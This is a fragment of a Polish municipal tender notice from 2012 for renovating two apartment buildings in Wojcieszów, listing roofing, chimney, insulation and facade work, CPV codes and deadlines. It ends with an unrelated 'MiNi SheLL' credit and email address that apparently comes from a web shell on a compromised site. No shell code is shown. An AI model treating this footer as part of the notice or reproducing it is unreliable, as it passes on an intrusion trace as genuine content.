<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1.LOKALIZACJA : 
Budynek mieszkalny  nr 5a ,posadowiony w  przy ul. Bolesława Chrobrego Wojcieszowie. Skierowany frontem w kierunku zachodnim
2. Ogólna charakterystyka budynku:
Budynek mieszkalny, wolnostojący, wielorodzinny o konstrukcji :   
        1. Ściany murowane-metodą tradycyjną z cegły i kamienia
        2. Stropy :
            - nad parterem -sklepienia łukowe 
            - nad piętrem - drewniane  
        3.  Dach dwuspadowy z lukernami, krokwiowy - o konstrukcji drewnianej.
        4. Stolarka :
           - drzwiowa- stan dostateczny. W związku z robotami elewacyjnymi należy wymienić drzwi wejściowe do budynku od strony  zachodniej
           - stolarka okienna - stan dostateczny . Wymienić okna na kl.schodowej  
       5. Elementy wyposażenia dachu jak : Kominy ,rynny, rury spustowe ,włazy dachowe czy ławy kominiarskie w znacznym stopniu  nie nadają  się  do dalszej eksploatacji.
    6. Elewacja:  
Tynki zewnętrzne nakrapiane - liczne, widoczne ślady odparzeń tynku  spowodowane przez lata eksploatacji oraz działanie czynników  atmosferycznych .Cokół tynkowany -w znacznym stopniu zniszczony. Opaska betonowa wokół                                         budynku-skorodowana przez wilgoć oraz długie lata eksploatacji.
7.Droga dojazdowa asfaltowa [bezpośrednio z ulicy Bolesława Chrobrego] oraz dwa wjazdy-wyjazdy drogą                                   gruntowa-utwardzoną, prowadzącą bezpośrednio z ul. Bolesława Chrobrego 
ZAKRES ROBÓT:
Zakres robót został opracowany na podstawie przeprowadzonego przeglądu stanu technicznego budynku  oraz w uzgodnieniu  z Zamawiającym:
1. Roboty dekarsko-blacharskie :
- roboty rozbiórkowe- pokrycia dachu, ołacenia i elementów wyposażenia dachu [wiatrownice, pasy nadrynnowe itd.]
- roboty dekarskie - wykonanie nowego pokrycia z dachówki karpiówki wraz z robotami towarzyszącymi [rynny,rury                                            spustowe ,itd]. W związku z planowanym ociepleniem ścian w/w budynku, należy na ścianach szczytowych przedłużyć   nowe łaty pod pokrycie o 20cm po każdej stronie szczytów
- roboty blacharskie - pasy nadrynnowe, kominy, wiatrownice
2.Roboty murarsko-tynkarskie: 
-przebudowa kominów od poziomu strychu z cegły pełnej kl.15 oraz powyżej dachu  z cegły klinkierowej pełnej, spoinowane
-zbicie tynków zewnętrznych-nakrapianych
- remont schodów wejściowych do budynku
- zbicie tynków cokołu oraz wykonanie nowej faktury cokołu z mas lastrykowych -płukanych
3. Wymiana stolarki okiennej i drzwiowej:
- wymiana stolarki drzwiowej na kl.schodowej - 2,0szt
- wymiana okna na kl.schodowej -2,0 szt
- remont schodów 
[częściowe rozebranie i reperacja istniejących wykonanie nowych z betonu i oblicowanie płytkami granitowymi]
-remont istniejącego cokołu -zbicie tynku na cokole oraz wykonanie nowego z mas lastrikowych
4. Izolacja dachu :
W związku z faktu że istnieje w budynku poddasze użytkowo-mieszkalne należy w trakcie robót dachowych wykonać izolację  połaci dachu z wełny mineralnej gr.min.10 cm.
 5.Roboty elewacyjne : 
- wykonanie ocieplenia ścian zewnętrznych oraz lukarn /styropian gr.10cm/ metodą lekko-mokrą wraz z wykonaniem faktury zewnętrznej tj. tynk cienkowarstwowy  w kolorze jasnym. W trakcie  wykonywania w/w robót należy zachować istniejącą architekturę zewnętrzną budynku.
- malowanie farbami olejnymi  istniejącej stolarki okiennej
6.Roboty w zakresie usuwania gruzu : 
- transport gruzu po w/w robotach budowlanych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.21.00-2, 45.26.00.00-7, 45.26.25.00-6, 45.26.14.10-1, 45.44.30.00-4, 45.42.00.00-7, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty remontowe budynku mieszkalnego nr 8 przy ul. Gminnej w Wojcieszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2
3.2.LOKALIZACJA :
Budynek mieszkalny  nr 8, posadowiony w  przy ul. Gminnej w Wojcieszowie. Frontem usytuowany w kierunku wschodnim.
2. Ogólna charakterystyka budynku:
Budynek mieszkalny, wolnostojący, podpiwniczony ,wielorodzinny. Ściany z cegły murowane- metodą tradycyjną. Stropy drewniane ,dach dwuspadowy z luxernami od strony wschodniej, krokwiowo-jętkowy o konstrukcji drewnianej. Pokrycie dachu-dachówka karpiówka ,widoczne ślady zacieków ,spowodowane brakiem szczelności pokrycia.
Elewacja:  
Tynki zewnętrzne nakrapiane -   stan dobry
Stolarka okienna i drzwiowa w lokalach mieszkalnych w stanie dostatecznym
Teren wokół budynku: Istniejąca opaska betonowa-stan dobry. Droga dojazdowa  -asfaltowa i  wewnętrzna - utwardzona - st.dobry

ZAKRES ROBÓT:
Zakres robót został opracowany na podstawie przeprowadzonego przeglądu stanu technicznego budynku  oraz w uzgodnieniu z Zamawiającym:
1. Rusztowania - montaż i demontaż rusztowań zewnętrznych oraz przy kominach
2. Roboty dekarsko-blacharskie :
2.1. Odtworzenie istniejącego pokrycia:
-roboty rozbiórkowe- pokrycia dachu, ołacenia i elementów wyposażenia dachu [wiatrownice, ławy kominiarskie ,rynny, rury  spustowe itd.]
- wykonanie wstępnego krycia dachu z folii wysokoparoprzepuszczalnej
-roboty dekarskie - wykonanie nowego pokrycia z dachówki ceramicznej /karpiówka/ wraz z robotami towarzyszącymi  [rynny, rury spustowe ,itd]
- roboty blacharskie - pasy nadrynnowe, kominy, wiatrownice
 3. Roboty izolacyjne:
3.1 W trakcie wykonywania przełożenia pokrycia dachu/po jego wykonaniu / należy wykonać izolację cieplną połaci dachu z wełny mineralnej gr.min.15cm.W.w wełnę należy ułożyć między krokwiami 
4.Roboty murarsko-tynkarskie: 
-przebudowa kominów od poziomu strychu wraz z wykonaniem tynków kat.II. Ponad dachem z cegły klinkierowej ,spoinowane
5.Roboty w zakresie usuwania gruzu : 
- transport gruzu po w/w robotach budowlanych
4. Szczegółowy zakres prac określa Przedmiar stanowiący załącznik nr 8 do SIWZ, oraz Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych stanowiąca załącznik nr 9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.21.00-2, 45.26.00.00-7, 45.26.25.00-6, 45.26.14.10-1, 45.11.12.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com